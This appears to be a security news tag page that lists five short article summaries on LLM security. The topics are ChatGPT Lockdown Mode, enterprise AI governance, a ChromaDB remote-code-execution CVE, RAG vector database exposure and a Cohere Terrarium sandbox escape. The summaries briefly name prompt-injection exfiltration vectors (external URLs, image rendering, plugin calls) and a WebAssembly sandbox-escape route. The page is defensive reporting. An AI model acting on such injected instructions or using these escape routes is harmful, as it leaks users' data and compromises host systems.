// #llm-security
5 articles
Enterprise AI Tool Governance: Controlling Access, Data Flows, and Shadow AI Risk
The rollout of ChatGPT Lockdown Mode highlights the broader challenge of governing AI tool access in enterprise environments: organisations must balance productivity benefits against data loss risk, prompt-injection exposure, and the proliferation of unofficial AI tools used without IT oversight. This guide covers the IAM and DLP controls that define an enterprise AI governance posture.
OpenAI Rolls Out ChatGPT Lockdown Mode to Block Prompt-Injection Data Exfiltration
OpenAI has released ChatGPT Lockdown Mode, a security configuration that prevents ChatGPT from loading external URLs, rendering images from arbitrary sources, or executing third-party plugin calls — the primary vectors for prompt-injection attacks that cause ChatGPT to exfiltrate data to attacker-controlled endpoints. Enterprise and education customers can now enforce Lockdown Mode organisation-wide via the admin console.
ChromaDB CVSS 10.0 Pre-Auth RCE CVE-2026-45829: AI Vector Database Compromise via HuggingFace Model Injection
HiddenLayer and the Cloud Security Alliance published disclosures of CVE-2026-45829, a CVSS 10.0 unauthenticated remote code execution vulnerability in ChromaDB's Python FastAPI server, on 18–20 May 2026. Attackers can inject malicious code via a crafted HuggingFace-hosted model before the authentication gate fires. Approximately 73% of ChromaDB deployments are internet-exposed. No patch exists for affected versions.
Securing RAG Pipeline Architecture: Vector Databases Are the New Unmanaged Attack Surface in Enterprise AI
The ChromaDB CVE-2026-45829 disclosure exposes a systemic architectural gap in enterprise AI deployments: vector databases used in retrieval-augmented generation pipelines are being deployed without the security controls applied to comparable databases handling sensitive data. The attack surface analysis and architectural recommendations for secure RAG pipeline design apply regardless of which vector database product is in use.
Cohere Terrarium AI Sandbox Escape — CVSS 9.3 WebAssembly Flaw Allows Root Code Execution on Host
CVE-2026-5752 (CVSS 9.3) in Cohere Terrarium allows an attacker to escape the Pyodide WebAssembly sandbox via JavaScript prototype chain traversal, achieving root code execution on the host Node.js process. Organisations running AI code execution environments should patch immediately and network-isolate these workloads.